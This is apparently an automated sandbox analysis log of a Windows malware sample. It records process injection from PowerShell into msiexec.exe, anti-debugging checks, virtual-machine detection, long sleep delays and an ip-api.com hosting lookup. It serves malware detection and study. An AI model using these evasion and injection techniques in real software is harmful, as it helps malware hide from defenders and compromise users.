Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599090	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598763	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598657	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6508			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3148			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7012	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2440	Thread sleep count: 1620 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2440	Thread sleep count: 8214 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -599090s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -598763s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -598657s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -99438s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -99313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -99094s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -98969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -98860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -98735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -98610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -98485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -98360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -98235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -98110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -97841s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1980	Thread sleep time: -594110s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Code function: 0_2_00402645 FindFirstFileA,	0_2_00402645
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Code function: 0_2_00405FF5 FindFirstFileA,FindClose,	0_2_00405FF5
Source: C:\Users\user\Desktop\ulf4JrCRk2.exe	Code function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004055B1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599090	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598763	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598657	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 99094	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 98110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 97841	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior

Source: msiexec.exe, 00000005.00000002.2614911399.000000000837A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: msiexec.exe, 00000005.00000002.2614911399.00000000083D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

API call chain: ExitProcess graph end node

graph_0-3403

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 5_2_02E37EC0 CheckRemoteDebuggerPresent,

5_2_02E37EC0

Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_02C6D6E0 LdrInitializeThunk,

2_2_02C6D6E0

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

Code function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040601C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 40C0000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
